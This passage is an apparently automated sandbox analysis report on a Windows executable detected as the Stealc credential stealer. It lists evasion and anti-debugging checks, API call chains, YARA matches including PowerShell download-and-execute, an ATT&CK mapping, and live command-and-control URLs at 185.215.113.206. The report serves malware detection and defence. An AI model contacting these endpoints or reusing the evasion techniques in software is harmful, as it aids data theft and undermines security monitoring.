              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27080
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25898
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F718A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00F718A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F73910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F73910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F71269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F71269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F71250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F71250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00F7E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00F7CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F723A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00F723A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F72390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00F72390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F6DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F6DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F74B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00F74B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F74B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F74B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00F7D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00F7DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F616B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00F616B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F616A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00F616A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F81BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00F81BF0
              Source: file.exe, file.exe, 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1738692638.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1738692638.0000000000B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25893
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25884
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25905
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25738
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25757
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F64A60 VirtualProtect 00000000,00000004,00000100,?0_2_00F64A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F86390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F86390 mov eax, dword ptr fs:[00000030h]0_2_00F86390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F82AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00F82AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6640, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F846A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_00F846A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F84610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00F84610
              Source: file.exe, file.exe, 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00F82D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F82B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00F82B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F82A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00F82A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F82C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00F82C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1683174782.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6640, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1683174782.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6640, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/uP100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/P100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.phpjfile.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/uPfile.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://185.215.113.206file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/:file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.php/Pfile.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://185.215.113.206/wsfile.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/c4becf79229cb002.phprfile.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://185.215.113.206/c4becf79229cb002.phpVfile.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1561557
                                  Start date and time:2024-11-23 19:00:08 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 4s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:1
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 79%
                                  • Number of executed functions: 18
                                  • Number of non-executed functions: 121
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.946764198729386
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
